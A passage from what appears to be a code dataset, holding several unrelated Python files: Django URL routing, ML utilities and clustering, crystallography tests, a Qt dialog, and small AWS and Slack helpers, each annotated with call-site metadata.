((146, 12, 146, 43), 'os.rename', 'os.rename', ({(146, 22, 146, 33): 'gn_bak_path', (146, 35, 146, 42): 'gn_path'}, {}), '(gn_bak_path, gn_path)', False, 'import os\n'), ((101, 28, 101, 59), 'os.path.join', 'os.path.join', ({(101, 41, 101, 52): 'target_path', (101, 54, 101, 58): 'file'}, {}), '(target_path, file)', False, 'import os\n'), ((102, 26, 102, 65), 'os.path.join', 'os.path.join', ({(102, 39, 102, 48): 'test_path', (102, 50, 102, 64): '"""List.test.js"""'}, {}), "(test_path, 'List.test.js')", False, 'import os\n')] |
lukaszbanasiak/django-contrib-comments | tests/testapp/urls.py | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | from __future__ import absolute_import
from django.conf.urls import patterns, url
from django_comments.feeds import LatestCommentFeed
from custom_comments import views
feeds = {
'comments': LatestCommentFeed,
}
urlpatterns = patterns('',
url(r'^post/$', views.custom_submit_comment),
url(r'^flag/(\d+)/$', views.custom_flag_comment),
url(r'^delete/(\d+)/$', views.custom_delete_comment),
url(r'^approve/(\d+)/$', views.custom_approve_comment),
url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'),
)
urlpatterns += patterns('',
(r'^rss/comments/$', LatestCommentFeed()),
)
| [((15, 4, 15, 48), 'django.conf.urls.url', 'url', ({(15, 8, 15, 18): '"""^post/$"""', (15, 20, 15, 47): 'views.custom_submit_comment'}, {}), "('^post/$', views.custom_submit_comment)", False, 'from django.conf.urls import patterns, url\n'), ((16, 4, 16, 52), 'django.conf.urls.url', 'url', ({(16, 8, 16, 24): '"""^flag/(\\\\d+)/$"""', (16, 26, 16, 51): 'views.custom_flag_comment'}, {}), "('^flag/(\\\\d+)/$', views.custom_flag_comment)", False, 'from django.conf.urls import patterns, url\n'), ((17, 4, 17, 56), 'django.conf.urls.url', 'url', ({(17, 8, 17, 26): '"""^delete/(\\\\d+)/$"""', (17, 28, 17, 55): 'views.custom_delete_comment'}, {}), "('^delete/(\\\\d+)/$', views.custom_delete_comment)", False, 'from django.conf.urls import patterns, url\n'), ((18, 4, 18, 58), 'django.conf.urls.url', 'url', ({(18, 8, 18, 27): '"""^approve/(\\\\d+)/$"""', (18, 29, 18, 57): 'views.custom_approve_comment'}, {}), "('^approve/(\\\\d+)/$', views.custom_approve_comment)", False, 'from django.conf.urls import patterns, url\n'), ((19, 4, 19, 104), 'django.conf.urls.url', 'url', (), '', False, 'from django.conf.urls import patterns, url\n'), ((23, 25, 23, 44), 'django_comments.feeds.LatestCommentFeed', 'LatestCommentFeed', ({}, {}), '()', False, 'from django_comments.feeds import LatestCommentFeed\n')] |
rajasekar-venkatesan/Deep_Learning | pyTorch/utils.py | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | import pandas as pd, numpy as np
from sklearn.preprocessing import OneHotEncoder
author_int_dict = {'EAP':0,'HPL':1,'MWS':2}
def load_train_test_data (num_samples=None):
train_data = pd.read_csv('../data/train.csv')
train_data['author'] = [author_int_dict[a] for a in train_data['author'].tolist()]
test_data = pd.read_csv('../data/test.csv')
return train_data[:num_samples],test_data[:num_samples]
def categorical_labeler (labels):
labels = labels.reshape(-1, 1)
#labels = OneHotEncoder().fit_transform(labels).todense()
labels = np.array(labels, dtype=np.int64)
return labels
if __name__ == '__main__':
pass | [((7, 17, 7, 49), 'pandas.read_csv', 'pd.read_csv', ({(7, 29, 7, 48): '"""../data/train.csv"""'}, {}), "('../data/train.csv')", True, 'import pandas as pd, numpy as np\n'), ((9, 16, 9, 47), 'pandas.read_csv', 'pd.read_csv', ({(9, 28, 9, 46): '"""../data/test.csv"""'}, {}), "('../data/test.csv')", True, 'import pandas as pd, numpy as np\n'), ((15, 13, 15, 45), 'numpy.array', 'np.array', (), '', True, 'import pandas as pd, numpy as np\n')] |
TheBurningCrusade/A_mxnet | example/dec/dec.py | fa2a8e3c438bea16b993e9537f75e2082d83346f | # pylint: skip-file
import sys
import os
# code to automatically download dataset
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path
import mxnet as mx
import numpy as np
import data
from scipy.spatial.distance import cdist
from sklearn.cluster import KMeans
import model
from autoencoder import AutoEncoderModel
from solver import Solver, Monitor
import logging
def cluster_acc(Y_pred, Y):
from sklearn.utils.linear_assignment_ import linear_assignment
assert Y_pred.size == Y.size
D = max(Y_pred.max(), Y.max())+1
w = np.zeros((D,D), dtype=np.int64)
for i in range(Y_pred.size):
w[Y_pred[i], Y[i]] += 1
ind = linear_assignment(w.max() - w)
return sum([w[i,j] for i,j in ind])*1.0/Y_pred.size, w
class DECModel(model.MXModel):
class DECLoss(mx.operator.NumpyOp):
def __init__(self, num_centers, alpha):
super(DECModel.DECLoss, self).__init__(need_top_grad=False)
self.num_centers = num_centers
self.alpha = alpha
def forward(self, in_data, out_data):
z = in_data[0]
mu = in_data[1]
q = out_data[0]
self.mask = 1.0/(1.0+cdist(z, mu)**2/self.alpha)
q[:] = self.mask**((self.alpha+1.0)/2.0)
q[:] = (q.T/q.sum(axis=1)).T
def backward(self, out_grad, in_data, out_data, in_grad):
q = out_data[0]
z = in_data[0]
mu = in_data[1]
p = in_data[2]
dz = in_grad[0]
dmu = in_grad[1]
self.mask *= (self.alpha+1.0)/self.alpha*(p-q)
dz[:] = (z.T*self.mask.sum(axis=1)).T - self.mask.dot(mu)
dmu[:] = (mu.T*self.mask.sum(axis=0)).T - self.mask.T.dot(z)
def infer_shape(self, in_shape):
assert len(in_shape) == 3
assert len(in_shape[0]) == 2
input_shape = in_shape[0]
label_shape = (input_shape[0], self.num_centers)
mu_shape = (self.num_centers, input_shape[1])
out_shape = (input_shape[0], self.num_centers)
return [input_shape, mu_shape, label_shape], [out_shape]
def list_arguments(self):
return ['data', 'mu', 'label']
def setup(self, X, num_centers, alpha, save_to='dec_model'):
sep = X.shape[0]*9/10
X_train = X[:sep]
X_val = X[sep:]
ae_model = AutoEncoderModel(self.xpu, [X.shape[1],500,500,2000,10], pt_dropout=0.2)
if not os.path.exists(save_to+'_pt.arg'):
ae_model.layerwise_pretrain(X_train, 256, 50000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.finetune(X_train, 256, 100000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.save(save_to+'_pt.arg')
logging.log(logging.INFO, "Autoencoder Training error: %f"%ae_model.eval(X_train))
logging.log(logging.INFO, "Autoencoder Validation error: %f"%ae_model.eval(X_val))
else:
ae_model.load(save_to+'_pt.arg')
self.ae_model = ae_model
self.dec_op = DECModel.DECLoss(num_centers, alpha)
label = mx.sym.Variable('label')
self.feature = self.ae_model.encoder
self.loss = self.dec_op(data=self.ae_model.encoder, label=label, name='dec')
self.args.update({k:v for k,v in self.ae_model.args.items() if k in self.ae_model.encoder.list_arguments()})
self.args['dec_mu'] = mx.nd.empty((num_centers, self.ae_model.dims[-1]), ctx=self.xpu)
self.args_grad.update({k: mx.nd.empty(v.shape, ctx=self.xpu) for k,v in self.args.items()})
self.args_mult.update({k: k.endswith('bias') and 2.0 or 1.0 for k in self.args})
self.num_centers = num_centers
def cluster(self, X, y=None, update_interval=None):
N = X.shape[0]
if not update_interval:
update_interval = N
batch_size = 256
test_iter = mx.io.NDArrayIter({'data': X}, batch_size=batch_size, shuffle=False,
last_batch_handle='pad')
args = {k: mx.nd.array(v.asnumpy(), ctx=self.xpu) for k, v in self.args.items()}
z = model.extract_feature(self.feature, args, test_iter, N, self.xpu).values()[0]
kmeans = KMeans(self.num_centers, n_init=20)
kmeans.fit(z)
args['dec_mu'][:] = kmeans.cluster_centers_
solver = Solver('sgd', momentum=0.9, wd=0.0, learning_rate=0.01)
def ce(label, pred):
return np.sum(label*np.log(label/(pred+0.000001)))/label.shape[0]
solver.set_metric(mx.metric.CustomMetric(ce))
label_buff = np.zeros((X.shape[0], self.num_centers))
train_iter = mx.io.NDArrayIter({'data': X}, {'label': label_buff}, batch_size=batch_size,
shuffle=False, last_batch_handle='roll_over')
self.y_pred = np.zeros((X.shape[0]))
def refresh(i):
if i%update_interval == 0:
z = model.extract_feature(self.feature, args, test_iter, N, self.xpu).values()[0]
p = np.zeros((z.shape[0], self.num_centers))
self.dec_op.forward([z, args['dec_mu'].asnumpy()], [p])
y_pred = p.argmax(axis=1)
print np.std(np.bincount(y_pred)), np.bincount(y_pred)
print np.std(np.bincount(y.astype(np.int))), np.bincount(y.astype(np.int))
if y is not None:
print(cluster_acc(y_pred, y)[0])
weight = 1.0/p.sum(axis=0)
weight *= self.num_centers/weight.sum()
p = (p**2)*weight
train_iter.data_list[1][:] = (p.T/p.sum(axis=1)).T
print np.sum(y_pred != self.y_pred), 0.001*y_pred.shape[0]
if np.sum(y_pred != self.y_pred) < 0.001*y_pred.shape[0]:
self.y_pred = y_pred
return True
self.y_pred = y_pred
solver.set_iter_start_callback(refresh)
solver.set_monitor(Monitor(50))
solver.solve(self.xpu, self.loss, args, self.args_grad,
train_iter, 0, 1000000000, {}, False)
self.end_args = args
if y is not None:
return cluster_acc(self.y_pred, y)[0]
else:
return -1
def mnist_exp(xpu):
X, Y = data.get_mnist()
dec_model = DECModel(xpu, X, 10, 1.0, 'data/mnist')
acc = []
for i in [10*(2**j) for j in range(9)]:
acc.append(dec_model.cluster(X, Y, i))
logging.log(logging.INFO, 'Clustering Acc: %f at update interval: %d'%(acc[-1], i))
logging.info(str(acc))
logging.info('Best Clustering ACC: %f at update_interval: %d'%(np.max(acc), 10*(2**np.argmax(acc))))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
mnist_exp(mx.gpu(0))
| [] |
rimmartin/cctbx_project | cctbx/maptbx/tst_target_and_gradients.py | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | from __future__ import division
from cctbx.array_family import flex
from cctbx import xray
from cctbx import crystal
from cctbx import maptbx
from cctbx.maptbx import minimization
from libtbx.test_utils import approx_equal
import random
from cctbx.development import random_structure
from cctbx import sgtbx
if (1):
random.seed(0)
flex.set_random_seed(0)
def get_xrs():
crystal_symmetry = crystal.symmetry(
unit_cell=(10,10,10,90,90,90),
space_group_symbol="P 1")
return xray.structure(
crystal_symmetry=crystal_symmetry,
scatterers=flex.xray_scatterer([
xray.scatterer(label="C", site=(0,0,0))]))
def get_map(xrs, d_min=1.):
f_calc = xrs.structure_factors(d_min=d_min).f_calc()
fft_map = f_calc.fft_map()
fft_map.apply_sigma_scaling()
return fft_map.real_map_unpadded(), f_calc
def exercise_00():
"""
Exercise maptbx.target_and_gradients_diffmap .
"""
xrs = get_xrs()
map_data, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_data,
step = 0.3,
sites_frac = xrs.sites_frac())
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
assert approx_equal(tg.target(), 0)
assert approx_equal(list(tg.gradients()), [[0,0,0]])
xrs = xrs.translate(x=0.3, y=-0.5, z=0.7)
assert approx_equal(xrs.sites_cart(), [[0.3,-0.5,0.7]])
map_current, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_current,
step = 0.3,
sites_frac = xrs.sites_frac())
assert tg.target() > 0
for g in tg.gradients():
for g_ in g:
assert abs(g_)>0.
def exercise_01(d_min=1.0):
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization.
"""
xrs = get_xrs()
map_target, f_calc = get_map(xrs=xrs)
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
for sx in [-1,0,1]:
for sy in [-1,0,1]:
for sz in [-1,0,1]:
xrs_cp = xrs.deep_copy_scatterers()
xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz)
assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6)
crystal_gridding = maptbx.crystal_gridding(
unit_cell = xrs_cp.unit_cell(),
space_group_info = xrs_cp.space_group_info(),
pre_determined_n_real = map_target.accessor().all())
o = minimization.run(
xray_structure = xrs_cp,
miller_array = f_calc,
crystal_gridding = crystal_gridding,
map_target = map_target,
step = d_min/4,
target_type = "diffmap")
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
def exercise_02():
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization
(bigger model).
"""
def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error>0.7
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
for step in [miller_array.d_min()/4]*5:
minimized = minimization.run(
xray_structure = xrs_sh,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = step,
geometry_restraints_manager = None,
target_type = "diffmap")
xrs_sh = minimized.xray_structure
map_current = minimized.map_current
final_error = flex.mean(xrs.distances(other = minimized.xray_structure))
assert approx_equal(start_error, 0.8, 1.e-3)
assert final_error < 1.e-4
def exercise_03():
"""
Exercise maptbx.target_and_gradients_simple.
"""
def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
#
t1 = maptbx.real_space_target_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
selection = flex.bool(xrs_sh.scatterers().size(), True))
g1 = maptbx.real_space_gradients_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
o = maptbx.target_and_gradients_simple(
unit_cell = xrs.unit_cell(),
map_target = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
assert approx_equal(t1, o.target())
for gi,gj in zip(g1, o.gradients()):
assert approx_equal(gi, gj)
def exercise_04():
"""
Exercise maptbx.target_and_gradients_simple in action: minimization
(bigger model).
"""
def compute_map(xray_structure, d_min=1., resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 150)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.3)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error > 0.29
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
xrs_sh_ = xrs_sh.deep_copy_scatterers()
minimized = minimization.run(
xray_structure = xrs_sh_,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = 0.5,
geometry_restraints_manager = None,
target_type = "simple")
xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart)
final_error = flex.mean(xrs.distances(other = xrs_sh_))
assert final_error < 0.015
if (__name__ == "__main__"):
exercise_00()
exercise_01()
exercise_02()
exercise_03()
exercise_04()
| [((13, 2, 13, 16), 'random.seed', 'random.seed', ({(13, 14, 13, 15): '(0)'}, {}), '(0)', False, 'import random\n'), ((14, 2, 14, 25), 'cctbx.array_family.flex.set_random_seed', 'flex.set_random_seed', ({(14, 23, 14, 24): '(0)'}, {}), '(0)', False, 'from cctbx.array_family import flex\n'), ((17, 21, 19, 29), 'cctbx.crystal.symmetry', 'crystal.symmetry', (), '', False, 'from cctbx import crystal\n'), ((123, 9, 123, 46), 'libtbx.test_utils.approx_equal', 'approx_equal', ({(123, 22, 123, 33): 'start_error', (123, 35, 123, 38): '(0.8)', (123, 40, 123, 45): '(0.001)'}, {}), '(start_error, 0.8, 0.001)', False, 'from libtbx.test_utils import approx_equal\n'), ((188, 14, 197, 43), 'cctbx.maptbx.minimization.run', 'minimization.run', (), '', False, 'from cctbx.maptbx import minimization\n'), ((110, 16, 119, 46), 'cctbx.maptbx.minimization.run', 'minimization.run', (), '', False, 'from cctbx.maptbx import minimization\n'), ((163, 11, 163, 31), 'libtbx.test_utils.approx_equal', 'approx_equal', ({(163, 24, 163, 26): 'gi', (163, 28, 163, 30): 'gj'}, {}), '(gi, gj)', False, 'from libtbx.test_utils import approx_equal\n'), ((99, 24, 99, 57), 'cctbx.sgtbx.space_group_info', 'sgtbx.space_group_info', ({(99, 47, 99, 56): '"""P212121"""'}, {}), "('P212121')", False, 'from cctbx import sgtbx\n'), ((137, 24, 137, 57), 'cctbx.sgtbx.space_group_info', 'sgtbx.space_group_info', ({(137, 47, 137, 56): '"""P212121"""'}, {}), "('P212121')", False, 'from cctbx import sgtbx\n'), ((177, 24, 177, 57), 'cctbx.sgtbx.space_group_info', 'sgtbx.space_group_info', ({(177, 47, 177, 56): '"""P212121"""'}, {}), "('P212121')", False, 'from cctbx import sgtbx\n'), ((77, 12, 83, 39), 'cctbx.maptbx.minimization.run', 'minimization.run', (), '', False, 'from cctbx.maptbx import minimization\n'), ((23, 6, 23, 45), 'cctbx.xray.scatterer', 'xray.scatterer', (), '', False, 'from cctbx import xray\n')] |
viktor-ferenczi/open-imagilib | open_imagilib/matrix.py | 3e7328840d58fd49eda28490e9bddf91390b1981 | """ LED matrix
"""
__all__ = ['Matrix']
from .colors import Color, on, off
from .fonts import font_6x8
class Matrix(list):
def __init__(self, source=None) -> None:
if source is None:
row_iter = ([off for _ in range(8)] for _ in range(8))
elif isinstance(source, list):
row_iter = (list(row) for row in source)
else:
raise TypeError('Unknown source to build a Matrix from')
super().__init__(row_iter)
def background(self, color: Color) -> None:
for i in range(8):
for j in range(8):
self[i][j] = color
def character(self, char: str, char_color: Color = on, *, x_offset: int = 1) -> None:
if x_offset <= -8 or x_offset >= 8:
return
if len(char) > 1:
char = char[0]
if not char:
char = ' '
if char < ' ' or char > '\x7f':
char = '\x7f'
bitmap = font_6x8[ord(char) - 32]
for i, row in enumerate(bitmap):
for j, c in enumerate(row):
if c != ' ':
x = x_offset + j
if 0 <= x < 8:
self[i][x] = char_color
| [] |
alexandru-dinu/PRML | prml/linear/_classifier.py | acd823e098df67abe0306a70225e7539f8edda40 | class Classifier(object):
"""Base class for classifiers."""
| [] |
DAtek/datek-app-utils | tests/env_config/test_base.py | 4783345d548bd85b1f6f99679be30b978e368e0e | from pytest import raises
from datek_app_utils.env_config.base import BaseConfig
from datek_app_utils.env_config.errors import InstantiationForbiddenError
class SomeOtherMixinWhichDoesntRelateToEnvConfig:
color = "red"
class TestConfig:
def test_iter(self, monkeypatch, key_volume, base_config_class):
volume = 5
monkeypatch.setenv(key_volume, str(volume))
class Config(SomeOtherMixinWhichDoesntRelateToEnvConfig, base_config_class):
TYPE: str
items = [item for item in Config]
assert len(items) == 5
assert Config.color == "red"
assert items[0].name == "TYPE"
assert items[0].value is None
assert items[0].type == str
assert items[1].name == "FIELD_WITH_DEFAULT_VALUE"
assert items[1].value == "C"
assert items[1].type == str
assert items[2].name == "NON_MANDATORY_FIELD"
assert items[2].value is None
assert items[2].type == str
assert items[3].name == "TYPED_NON_MANDATORY_FIELD"
assert items[3].value is None
assert items[3].type == str
assert items[4].name == "VOLUME"
assert items[4].value == volume
assert items[4].type == int
def test_get(self, monkeypatch, key_volume, base_config_class):
volume = 10
monkeypatch.setenv(key_volume, str(volume))
assert getattr(base_config_class, "VOLUME") == volume
def test_constructor_is_forbidden(self):
class Config(BaseConfig):
pass
with raises(InstantiationForbiddenError):
Config()
| [((54, 13, 54, 48), 'pytest.raises', 'raises', ({(54, 20, 54, 47): 'InstantiationForbiddenError'}, {}), '(InstantiationForbiddenError)', False, 'from pytest import raises\n')] |
korniichuk/cvr-features | comprehend.py | ed3569222781258d4de242db3c9b51f19573bacb | # -*- coding: utf-8 -*-
# Name: comprehend
# Version: 0.1a2
# Owner: Ruslan Korniichuk
# Maintainer(s):
import boto3
def get_sentiment(text, language_code='en'):
"""Get sentiment.
Inspects text and returns an inference of the prevailing sentiment
(positive, neutral, mixed, or negative).
Args:
text: UTF-8 text string. Each string must contain fewer that
5,000 bytes of UTF-8 encoded characters (required | type: str).
language_code: language of text (not required | type: str |
default: 'en').
Returns:
sentiment: sentiment: positive, neutral, mixed, or negative
(type: str).
"""
def prepare_text(text):
while len(bytes(text, 'utf-8')) > 4999:
text = text[:-1]
return text
comprehend = boto3.client('comprehend')
text = prepare_text(text)
try:
r = comprehend.detect_sentiment(Text=text, LanguageCode='en')
except Exception as e:
raise e
sentiment = r['Sentiment'].lower()
return sentiment
# Example. Get sentiment of text below:
# "I ordered a small and expected it to fit just right but it was a little bit
# more like a medium-large. It was great quality. It's a lighter brown than
# pictured but fairly close. Would be ten times better if it was lined with
# cotton or wool on the inside."
# text = "I ordered a small and expected it to fit just right but it was a \
# little bit more like a medium-large. It was great quality. It's a \
# lighter brown than pictured but fairly close. Would be ten times \
# better if it was lined with cotton or wool on the inside."
# get_sentiment(text)
| [((33, 17, 33, 43), 'boto3.client', 'boto3.client', ({(33, 30, 33, 42): '"""comprehend"""'}, {}), "('comprehend')", False, 'import boto3\n')] |
Kayvv/mapclientplugins.argonsceneexporterstep | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'configuredialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class Ui_ConfigureDialog(object):
def setupUi(self, ConfigureDialog):
if not ConfigureDialog.objectName():
ConfigureDialog.setObjectName(u"ConfigureDialog")
ConfigureDialog.resize(510, 342)
self.gridLayout = QGridLayout(ConfigureDialog)
self.gridLayout.setObjectName(u"gridLayout")
self.configGroupBox = QGroupBox(ConfigureDialog)
self.configGroupBox.setObjectName(u"configGroupBox")
self.formLayout = QFormLayout(self.configGroupBox)
self.formLayout.setObjectName(u"formLayout")
self.label0 = QLabel(self.configGroupBox)
self.label0.setObjectName(u"label0")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.label0)
self.lineEditIdentifier = QLineEdit(self.configGroupBox)
self.lineEditIdentifier.setObjectName(u"lineEditIdentifier")
self.formLayout.setWidget(0, QFormLayout.FieldRole, self.lineEditIdentifier)
self.label_3 = QLabel(self.configGroupBox)
self.label_3.setObjectName(u"label_3")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.label_3)
self.prefix_lineEdit = QLineEdit(self.configGroupBox)
self.prefix_lineEdit.setObjectName(u"prefix_lineEdit")
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.prefix_lineEdit)
self.label_4 = QLabel(self.configGroupBox)
self.label_4.setObjectName(u"label_4")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.label_4)
self.timeSteps_lineEdit = QLineEdit(self.configGroupBox)
self.timeSteps_lineEdit.setObjectName(u"timeSteps_lineEdit")
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.timeSteps_lineEdit)
self.label = QLabel(self.configGroupBox)
self.label.setObjectName(u"label")
self.formLayout.setWidget(4, QFormLayout.LabelRole, self.label)
self.initialTime_lineEdit = QLineEdit(self.configGroupBox)
self.initialTime_lineEdit.setObjectName(u"initialTime_lineEdit")
self.formLayout.setWidget(4, QFormLayout.FieldRole, self.initialTime_lineEdit)
self.label_2 = QLabel(self.configGroupBox)
self.label_2.setObjectName(u"label_2")
self.formLayout.setWidget(5, QFormLayout.LabelRole, self.label_2)
self.finishTime_lineEdit = QLineEdit(self.configGroupBox)
self.finishTime_lineEdit.setObjectName(u"finishTime_lineEdit")
self.formLayout.setWidget(5, QFormLayout.FieldRole, self.finishTime_lineEdit)
self.label1 = QLabel(self.configGroupBox)
self.label1.setObjectName(u"label1")
self.formLayout.setWidget(6, QFormLayout.LabelRole, self.label1)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.lineEditOutputDirectory = QLineEdit(self.configGroupBox)
self.lineEditOutputDirectory.setObjectName(u"lineEditOutputDirectory")
self.horizontalLayout.addWidget(self.lineEditOutputDirectory)
self.pushButtonOutputDirectory = QPushButton(self.configGroupBox)
self.pushButtonOutputDirectory.setObjectName(u"pushButtonOutputDirectory")
self.horizontalLayout.addWidget(self.pushButtonOutputDirectory)
self.formLayout.setLayout(6, QFormLayout.FieldRole, self.horizontalLayout)
self.label_5 = QLabel(self.configGroupBox)
self.label_5.setObjectName(u"label_5")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.label_5)
self.comboBoxExportType = QComboBox(self.configGroupBox)
self.comboBoxExportType.addItem("")
self.comboBoxExportType.addItem("")
self.comboBoxExportType.setObjectName(u"comboBoxExportType")
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.comboBoxExportType)
self.gridLayout.addWidget(self.configGroupBox, 0, 0, 1, 1)
self.buttonBox = QDialogButtonBox(ConfigureDialog)
self.buttonBox.setObjectName(u"buttonBox")
self.buttonBox.setOrientation(Qt.Horizontal)
self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
QWidget.setTabOrder(self.lineEditIdentifier, self.prefix_lineEdit)
QWidget.setTabOrder(self.prefix_lineEdit, self.comboBoxExportType)
QWidget.setTabOrder(self.comboBoxExportType, self.timeSteps_lineEdit)
QWidget.setTabOrder(self.timeSteps_lineEdit, self.initialTime_lineEdit)
QWidget.setTabOrder(self.initialTime_lineEdit, self.finishTime_lineEdit)
QWidget.setTabOrder(self.finishTime_lineEdit, self.lineEditOutputDirectory)
QWidget.setTabOrder(self.lineEditOutputDirectory, self.pushButtonOutputDirectory)
self.retranslateUi(ConfigureDialog)
self.buttonBox.accepted.connect(ConfigureDialog.accept)
self.buttonBox.rejected.connect(ConfigureDialog.reject)
self.comboBoxExportType.setCurrentIndex(0)
QMetaObject.connectSlotsByName(ConfigureDialog)
# setupUi
def retranslateUi(self, ConfigureDialog):
ConfigureDialog.setWindowTitle(QCoreApplication.translate("ConfigureDialog", u"Configure Step", None))
self.configGroupBox.setTitle("")
self.label0.setText(QCoreApplication.translate("ConfigureDialog", u"identifier: ", None))
self.label_3.setText(QCoreApplication.translate("ConfigureDialog", u"Prefix : ", None))
self.label_4.setText(QCoreApplication.translate("ConfigureDialog", u"Time Steps : ", None))
self.label.setText(QCoreApplication.translate("ConfigureDialog", u"Initial Time : ", None))
self.label_2.setText(QCoreApplication.translate("ConfigureDialog", u"Finish Time : ", None))
self.label1.setText(QCoreApplication.translate("ConfigureDialog", u"Output directory:", None))
self.pushButtonOutputDirectory.setText(QCoreApplication.translate("ConfigureDialog", u"...", None))
self.label_5.setText(QCoreApplication.translate("ConfigureDialog", u"Export type:", None))
self.comboBoxExportType.setItemText(0, QCoreApplication.translate("ConfigureDialog", u"webgl", None))
self.comboBoxExportType.setItemText(1, QCoreApplication.translate("ConfigureDialog", u"thumbnail", None))
# retranslateUi
| [] |
owasp-sbot/pbx-gs-python-utils | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | import base64
import tempfile
import requests
from osbot_aws.apis import Secrets
from osbot_aws.apis.Lambdas import Lambdas
def upload_png_file(channel_id, file):
bot_token = Secrets('slack-gs-bot').value()
my_file = {
'file': ('/tmp/myfile.png', open(file, 'rb'), 'png')
}
payload = {
"filename" : 'image.png',
"token" : bot_token,
"channels" : [channel_id],
}
requests.post("https://slack.com/api/files.upload", params=payload, files=my_file)
return 'image sent .... '
def run(event, context):
channel = event['channel']
puml = event['puml']
puml = puml.replace('<', '<').replace('>', '>')
(fd, tmp_file) = tempfile.mkstemp('png)')
puml_to_png = Lambda('utils.puml_to_png').invoke
result = puml_to_png({"puml": puml })
with open(tmp_file, "wb") as fh:
fh.write(base64.decodebytes(result['png_base64'].encode()))
return upload_png_file(channel, tmp_file)
